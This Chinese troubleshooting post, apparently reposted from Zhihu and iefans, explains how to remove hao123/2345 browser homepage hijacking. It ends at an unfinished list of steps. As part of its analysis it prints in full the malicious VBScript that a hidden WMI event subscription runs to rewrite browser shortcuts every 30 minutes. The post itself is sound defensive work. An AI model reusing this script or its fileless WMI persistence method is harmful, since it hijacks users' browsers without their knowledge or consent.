被hao123劫持主頁最佳解決辦法

時間 2019-11-16

標籤 hao123 hao 劫持主頁最佳解決辦法简体版

原文原文鏈接

做者：田沒法
連接：https://www.zhihu.com/question/39881858/answer/159582643
來源：知乎
著做權歸做者全部。商業轉載請聯繫做者得到受權，非商業轉載請註明出處。

被hao123劫持主頁最佳解決辦法chrome

方法一數據庫

下載360衛士，而後使用其主頁劫持工具，能夠恢復，可是還沒結束，若是這是你高高興興地刪除360，等第二次打開電腦時，又會出現主頁被可惡的123hao劫持的狀況，完全解決問題的辦法是，在C:\Windows\System32\wbem\scrcons.exe這個文件中，找到刪除scrcons.exe這個文件，他纔是罪大惡極的禍端，而後你會發現刪除不了，這是仍是咱們偉大的360衛士來幫忙，打開360衛士的文件粉碎機，把找到的scrcons.exe直接拖進去，OK，123hao劫持主頁完美解決，能夠感謝並刪除360衛士了windows

方法二瀏覽器

考慮到可能加載了啓動項，在註冊表、啓動項、服務等中均未查找到相關信息，重啓後IE快捷方式被從新篡改。嘗試了事件查看器和任務計劃，均未在裏面查出任何信息。以後又安裝了超級兔子、360、exterminateit等工具進行檢查，也未檢出。打開ProcessMonitor進行監視，發現每隔30分鐘出現一個scrcons.exe進程自動啓動並修改快速啓動欄的命令，而後自動關閉（幸好是30分鐘一次，你要是24小時一次，那我就杯具了…），修改Win7下opera快速啓動圖標路徑相似以下： C:\Users\iefans\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera12.01 1532.lnk 查找資料，發現這應該是一個經過WMI發起的定時自動運行腳本。要查看WMI事件，到如下地址下載WMITool並安裝http://www.microsoft.com/en-us/download/details.aspx?id=24045 安裝後打開WMI event viewer，點擊左上角register for events，彈出Connect to namespace框，填入「root\subscription」，肯定，出現下圖：點擊左側_EventFilter:Name="unown_filter"，再至右側右鍵點擊ActiveScriptEventConsume r Name="unown"，選擇view instant properties，以下圖：查看ScriptText項可知，這是一段VBScript調用系統服務間隔30分鐘執行一次，將全部瀏覽器調用加上「http://www.2345.com/?kunown」！抓住你了~！隱藏的夠深，沒常駐進程，沒有文件（把本身存儲在WMI數據庫中）。受到影響的瀏覽器有（各色瀏覽器，差很少齊了）： "IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe" 具體代碼以下：On Error Resume Next:Const link = "http://www.2345.com/?kunown":browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):strDesktop = "C:\Users\Gemini\Desktop":strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch":UserPinnedStartMenu = QuickLaunch & "\User Pinned\StartMenu":UserPinnedTaskBar = QuickLaunch & "\User Pinned\TaskBar":For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If 最後，清除方法：在WMI event viewer中將「_EventFilter:Name="unown_filter"」項目右鍵刪除！刪不掉？到WMITool安裝路徑（例如：C:\Program Files (x86)\WMI Tools）下，右鍵點擊wbemeventviewer.exe，選擇以管理員身份運行！刪之！還沒完，還要手動將快速啓動欄中，將各個瀏覽器快捷命令中的http://www.2345.com/?kunown去掉！暫時就這麼多了，還有沒有其它影響的話，用用再看吧！解決方法來自：Gemini 但願你們可以把這解決方法普及開來，如今大多人仍是用修改快捷方式之類的解決方案，已經落伍了... 原文出處： http://www.iefans.net/ie-zhuye-jiechi-www-2345-com-kunown工具

主頁被劫持的狀況常常出現，有的是裝了流氓軟件被改主頁，有的是用windows激活軟件等被改主頁，收集了幾個解決辦法：ui

一、檢查chrome和IE等圖標，右鍵屬性-快捷方式- 目標若是是這樣的「C:\Program Files (x86)\Google\Chrome\Application\chrome.exe」 www.hao123.com 把後面的刪除就能夠了google

二、看下目錄下的chrome是否啓動方式後綴名加了hao123 Start Menu下的 C:\ProgramData\Microsoft\Windows\Start Menu\Programsurl

三、任務欄下的圖標，有一次發現就是任務欄下的被改了，目錄以下
C:\Users\你的電腦名\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar
右鍵查看屬性，若目標後面有hao123刪了就好了spa

四、運行msconfig，找到系統自啓動項，禁用陌生的自啓動項。都陌生的，請禁用所有自啓動項，若是解決了再一次解禁一部分自啓動項來定位有問題的自啓動項。.net

五、運行taskschd.msc打開任務計劃程序，定位問題方法同上。

今天研究(翻，牆)，裝了幾個插件，什麼雲帆、外遇、藍燈

後來個人google瀏覽器被hao123劫持，百度瀏覽器被hao524劫持

刪除瀏覽器快捷方式、屬性目標裏的後綴，過很少久又被劫持，把我搞毛了

弄了一夜，發現是wmi腳本被篡改，寫入了惡意代碼

解決辦法：

一、修改快捷方式、在快捷方式上右擊屬性對話框手工刪除網址的部分

二、加載了啓動項的，在註冊表、啓動項、服務中搜索相關網址信息，找到後刪除

三、使用wmitools工具刪除wmi惡意代碼

wmitools下載地址：https://pan.baidu.com/s/1bo7GQvH

修改步驟以下：